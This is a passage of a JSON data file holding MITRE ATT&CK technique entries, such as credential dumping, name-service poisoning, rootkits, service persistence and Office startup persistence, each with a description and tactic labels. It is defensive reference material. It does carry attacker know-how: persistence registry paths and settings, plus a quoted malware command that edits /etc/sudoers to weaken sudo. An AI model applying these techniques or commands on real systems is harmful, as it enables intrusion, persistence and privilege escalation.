[MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.","tactics":["credential-access"],"externalId":"T1003","externalUrl":"https://attack.mitre.org/techniques/T1003"},"key":"mitre/credential-dumping"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Execution through Module Load","version":"1.0","description":"The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n    \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n    \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n    \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries can use this functionality as a way to execute arbitrary code on a system.","tactics":["execution"],"externalId":"T1129","externalUrl":"https://attack.mitre.org/techniques/T1129"},"key":"mitre/execution-through-module-load"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Stored Data Manipulation","version":"1.0","description":"Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","tactics":["impact"],"externalId":"T1492","externalUrl":"https://attack.mitre.org/techniques/T1492"},"key":"mitre/stored-data-manipulation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"File System Logical Offsets","version":"1.0","description":"Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)","tactics":["defense-evasion"],"externalId":"T1006","externalUrl":"https://attack.mitre.org/techniques/T1006"},"key":"mitre/file-system-logical-offsets"},{"type":"mitre","subtype":"technique","metadata":{"technique":"File System Permissions Weakness","version":"1.0","description":"Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.\n\n### Services\n\nManipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.\n\n### Executable Installers\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)","tactics":["persistence","privilege-escalation"],"externalId":"T1044","externalUrl":"https://attack.mitre.org/techniques/T1044"},"key":"mitre/file-system-permissions-weakness"},{"type":"mitre","subtype":"technique","metadata":{"technique":"LLMNR/NBT-NS Poisoning and Relay","version":"2.0","description":"Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)","tactics":["credential-access"],"externalId":"T1171","externalUrl":"https://attack.mitre.org/techniques/T1171"},"key":"mitre/llmnr-nbt-ns-poisoning-and-relay"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Rootkit","version":"1.0","description":"Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)\n\nAdversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)","tactics":["defense-evasion"],"externalId":"T1014","externalUrl":"https://attack.mitre.org/techniques/T1014"},"key":"mitre/rootkit"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Systemd Service","version":"1.0","description":"Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)","tactics":["persistence"],"externalId":"T1501","externalUrl":"https://attack.mitre.org/techniques/T1501"},"key":"mitre/systemd-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Audio Capture","version":"1.0","description":"An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.","tactics":["collection"],"externalId":"T1123","externalUrl":"https://attack.mitre.org/techniques/T1123"},"key":"mitre/audio-capture"},{"type":"mitre","subtype":"technique","metadata":{"technique":"External Remote Services","version":"2.0","description":"Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028) can also be used externally.\n\nAdversaries may use remote services to initially access and/or persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.","tactics":["persistence","initial-access"],"externalId":"T1133","externalUrl":"https://attack.mitre.org/techniques/T1133"},"key":"mitre/external-remote-services"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Component Firmware","version":"1.0","description":"Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.","tactics":["defense-evasion","persistence"],"externalId":"T1109","externalUrl":"https://attack.mitre.org/techniques/T1109"},"key":"mitre/component-firmware"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Timestomp","version":"1.0","description":"Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)","tactics":["defense-evasion"],"externalId":"T1099","externalUrl":"https://attack.mitre.org/techniques/T1099"},"key":"mitre/timestomp"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Permission Groups Discovery","version":"1.0","description":"Adversaries may attempt to find local system or domain-level groups and permissions settings. \n\n### Windows\n\nExamples of commands that can list groups are net group /domain and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility.\n\n### Mac\n\nOn Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . -list /Groups for local groups.\n\n### Linux\n\nOn Linux, local groups can be enumerated with the groups command and domain groups via the ldapsearch command.","tactics":["discovery"],"externalId":"T1069","externalUrl":"https://attack.mitre.org/techniques/T1069"},"key":"mitre/permission-groups-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Email Collection","version":"1.0","description":"Adversaries may target user email to collect sensitive information from a target.\n\nFiles containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.\n\nAdversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.\n\nSome adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.","tactics":["collection"],"externalId":"T1114","externalUrl":"https://attack.mitre.org/techniques/T1114"},"key":"mitre/email-collection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Rc.common","version":"1.0","description":"During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).","tactics":["persistence"],"externalId":"T1163","externalUrl":"https://attack.mitre.org/techniques/T1163"},"key":"mitre/rc-common"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data from Removable Media","version":"1.0","description":"Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration.\n\nAdversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.","tactics":["collection"],"externalId":"T1025","externalUrl":"https://attack.mitre.org/techniques/T1025"},"key":"mitre/data-from-removable-media"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Code Signing","version":"1.0","description":"Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.","tactics":["defense-evasion"],"externalId":"T1116","externalUrl":"https://attack.mitre.org/techniques/T1116"},"key":"mitre/code-signing"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Process Hollowing","version":"1.0","description":"Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)","tactics":["defense-evasion"],"externalId":"T1093","externalUrl":"https://attack.mitre.org/techniques/T1093"},"key":"mitre/process-hollowing"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Domain Fronting","version":"1.0","description":"Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.","tactics":["command-and-control"],"externalId":"T1172","externalUrl":"https://attack.mitre.org/techniques/T1172"},"key":"mitre/domain-fronting"},{"type":"mitre","subtype":"technique","metadata":{"technique":"SID-History Injection","version":"1.0","description":"The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nAdversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).","tactics":["privilege-escalation"],"externalId":"T1178","externalUrl":"https://attack.mitre.org/techniques/T1178"},"key":"mitre/sid-history-injection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Port Monitors","version":"1.0","description":"A port monitor can be set through the  (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.","tactics":["persistence","privilege-escalation"],"externalId":"T1013","externalUrl":"https://attack.mitre.org/techniques/T1013"},"key":"mitre/port-monitors"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Spearphishing Link","version":"1.0","description":"Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons).","tactics":["initial-access"],"externalId":"T1192","externalUrl":"https://attack.mitre.org/techniques/T1192"},"key":"mitre/spearphishing-link"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Service Stop","version":"1.0","description":"Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)","tactics":["impact"],"externalId":"T1489","externalUrl":"https://attack.mitre.org/techniques/T1489"},"key":"mitre/service-stop"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Regsvcs/Regasm","version":"1.1","description":"Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nAdversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)","tactics":["defense-evasion","execution"],"externalId":"T1121","externalUrl":"https://attack.mitre.org/techniques/T1121"},"key":"mitre/regsvcs-regasm"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Sudo Caching","version":"1.0","description":"The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\" (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout that is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nAdversaries can abuse poor configurations of this to escalate privileges without needing the user's password. /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. When tty_tickets is disabled, adversaries can do this from any tty for that user. \n\nThe OSX Proton Malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers  (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.","tactics":["privilege-escalation"],"externalId":"T1206","externalUrl":"https://attack.mitre.org/techniques/T1206"},"key":"mitre/sudo-caching"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Security Software Discovery","version":"2.0","description":"Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.","tactics":["discovery"],"externalId":"T1063","externalUrl":"https://attack.mitre.org/techniques/T1063"},"key":"mitre/security-software-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Taint Shared Content","version":"1.0","description":"Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)","tactics":["lateral-movement"],"externalId":"T1080","externalUrl":"https://attack.mitre.org/techniques/T1080"},"key":"mitre/taint-shared-content"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Securityd Memory","version":"1.0","description":"In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)\n\nIf an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)","tactics":["credential-access"],"externalId":"T1167","externalUrl":"https://attack.mitre.org/techniques/T1167"},"key":"mitre/securityd-memory"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Screensaver","version":"1.1","description":"Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations. \n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)","tactics":["persistence"],"externalId":"T1180","externalUrl":"https://attack.mitre.org/techniques/T1180"},"key":"mitre/screensaver"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Startup Items","version":"1.0","description":"Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.","tactics":["persistence","privilege-escalation"],"externalId":"T1165","externalUrl":"https://attack.mitre.org/techniques/T1165"},"key":"mitre/startup-items"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Office Application Startup","version":"1.1","description":"Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.\n\n### Office Template Macros\n\nMicrosoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)\n\nWord Normal.dotm location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.\n\n### Office Test\n\nA Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n\n### Add-ins\n\nOffice add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)\n\nAdd-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\n### Outlook Rules, Forms, and Home Page\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) \n\nOutlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOutlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOutlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nTo abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)","tactics":["persistence"],"externalId":"T1137","externalUrl":"https://attack.mitre.org/techniques/T1137"},"key":"mitre/office-application-startup"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Disabling Security Tools","version":"1.0","description":"Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.","tactics":["defense-evasion"],"externalId":"T1089","externalUrl":"https://attack.mitre.org/techniques/T1089"},"key":"mitre/disabling-security-tools"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Disk Structure Wipe","version":"1.0","description":"Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon 